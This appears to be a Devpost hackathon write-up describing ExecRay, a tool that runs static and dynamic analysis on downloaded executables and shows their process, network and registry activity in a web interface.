Inspiration
Developers often want to understand the software that they download at a fine-grain level. From a security standpoint, it makes sense double check downloaded executable files for suspicious activity. An antivirus may only flag a file as a virus or mark it as safe, but abstracts away all of the internal processing. We wanted to showcase this processing, and give developers all the relevant information about the target executable so that they can make more informed decision on whether to include the software in their project.
What it does
We built a developer tool to perform static and dynamic code analysis on a target executable, with the intention of providing all the results to the user through a web interface. Some metrics accounted for include external process creation, hardware resources consumed, network activity (opened ports and REST API verbs), database connections, and system files and registry modification.
How we built it
The core static and dynamic analysis algorithm is written in Python. For the web application, we used Flask on the server-side and HTML/CSS/Javascript for the front-end. AWS (EC2) and Docker were used to spin up VMs on the cloud for deploying the executable files.
Challenges we ran into
This was my first time using AWS and Docker. Configuring these tools properly is a very technically exhaustive and slow process. What should have taken two minutes to establish an EC2 instance took 45 minutes. Regardless, we learned a lot this weekend.
Accomplishments that I'm proud of
We are proud of developing a fully containerized, scalable, usable security application over the course of two days.
What we learned
We honed our Python, DevOps, and systems programming knowledge. We didn't have much security experience either, so learning static and dynamic analysis techniques was extremely interesting.
What's next for ExecRay
We would love to further strengthen the core algorithms and track more hidden process information.
Log in or sign up for Devpost to join the conversation.